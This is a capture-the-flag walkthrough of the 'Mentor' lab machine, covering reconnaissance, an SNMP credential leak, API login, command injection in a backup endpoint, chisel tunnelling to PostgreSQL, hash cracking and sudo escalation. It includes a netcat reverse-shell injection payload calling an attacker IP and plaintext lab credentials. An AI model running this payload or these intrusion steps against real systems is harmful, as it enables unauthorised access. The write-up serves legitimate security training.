HTB machine: Mentor

Machine information:

[screenshot]

Information gathering:

Port scan:

rustscan -a 10.10.11.193 -- -sC -sV -Pn -oN nmap
PORT   STATE SERVICE REASON  VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c7:3b:fc:3c:f9:ce:ee:8b:48:18:d5:d1:af:8e:c2:bb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO6yWCATcj2UeU/SgSa+wK2fP5ixsrHb6pgufdO378n+BLNiDB6ljwm3U3PPdbdQqGZo1K7Tfsz+ejZj1nV80RY=
| 256 44:40:08:4c:0e:cb:d4:f1:8e:7e:ed:a8:5c:68:a4:f7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJjv9f3Jbxj42smHEXcChFPMNh1bqlAFHLi4Nr7w9fdv
80/tcp open http syn-ack Apache httpd 2.4.52
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET
| http-server-header:
| Apache/2.4.52 (Ubuntu)
|_ Werkzeug/2.0.3 Python/3.6.9
|_http-title: MentorQuotes
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80:

After adding the hosts entry and browsing to the site, it looks like a blog.

[screenshot]

Subdomain scan:

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://mentorquotes.htb/" -H 'Host: FUZZ.mentorquotes.htb' -fc 302 -mc all

The scan turns up one subdomain that answers with a 404; after adding it to hosts and visiting it, there is nothing to see on its root page.

[screenshot]

[screenshot]

Directory scan:

A directory scan of the api.mentorquotes.htb subdomain reveals existing directories.

dirsearch -u http://api.mentorquotes.htb

[screenshot]

The docs directory:

docs is the API documentation; from it we obtain the site administrator's email: james@mentorquotes.htb

[screenshot]

Before this was patched, you could register while impersonating james and obtain the admin cookie, then carry on from there. After the patch, the route is to obtain james's login password via SNMP and then get the admin cookie. Honestly, it was nicer before the fix.

snmpwalk:

sudo nmap -sU -Pn 10.10.11.193

[screenshot]

snmpwalk -v2c -c internal mentorquotes.htb

[screenshot]

Password found: kj23sadkj123as0-d213

[screenshot]

Using the API's login endpoint, modify the request and obtain the cookie (a JWT):

[screenshot]

[screenshot]

"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0"

[screenshot]
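As an added illustration (not from the original write-up), the token above split into header, claims and signature with plain Python, together with the checks a reviewer would run on it. It only inspects the token; it does not verify the signature, so nothing it returns should be trusted as authentic.

```python
import base64
import json

# The JWT returned by the login endpoint, copied from the write-up above.
TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
         "eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0."
         "peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0")


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the '=' padding JWTs strip."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def inspect_jwt(token: str) -> dict:
    """Split a compact JWS into its three parts WITHOUT verifying the
    signature. This is inspection only: it tells you what the token
    carries and what protections it lacks, never whether it is genuine."""
    try:
        header_b64, payload_b64, signature_b64 = token.split(".")
    except ValueError:
        raise ValueError("not a three-part compact JWS") from None
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    signature = b64url_decode(signature_b64)

    # Defender-side observations: claims that a well-built token should have.
    findings = []
    if "exp" not in payload:
        findings.append("no exp claim: token stays valid until the signing key changes")
    if "iat" not in payload:
        findings.append("no iat claim: issue time cannot be checked or aged out")
    if str(header.get("alg", "")).lower() == "none":
        findings.append("alg=none: token is unsigned")
    return {"header": header, "payload": payload,
            "signature_len": len(signature), "findings": findings}


if __name__ == "__main__":
    print(json.dumps(inspect_jwt(TOKEN), indent=2))
```

For this token the header is HS256 with a 32-byte signature, the claims are only username and email, and there is no exp or iat claim, so the session never ages out on its own.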

Now visiting admin, we get check and backup:

[screenshot]

check is not implemented yet; backup requires valid JSON POST parameters. After constructing valid parameters, the response body is just Done.

This is a POST request:

[screenshot]

Command injection:

Command injection is found in the path parameter:

[screenshot]

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.59 4444 >/tmp/f;

[screenshot]

postgresql:

The shell turns out to be inside a Docker container, and the container's PostgreSQL configuration is found in the application code:

[screenshot]

[screenshot]

# Database url if none is passed the default one is used
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")

Port forwarding:

#kali
./chisel server --reverse --port 8000
#target
./chisel client -v 10.10.14.59:8000 R:5432:172.22.0.1:5432

[screenshot]

psql -h 10.10.14.59 -U "postgres" -p 5432

[screenshot]

Cracking the hash gives svc:123meunomeeivani.

Log in as svc and get the user flag.

[screenshot]

Privilege escalation:

Here we can find james's password: SuperSecurePassword123__

The james user can run sh with sudo.

cat /etc/snmp/snmpd.conf

[screenshot]

[screenshot]

Wrap-up:

[screenshot]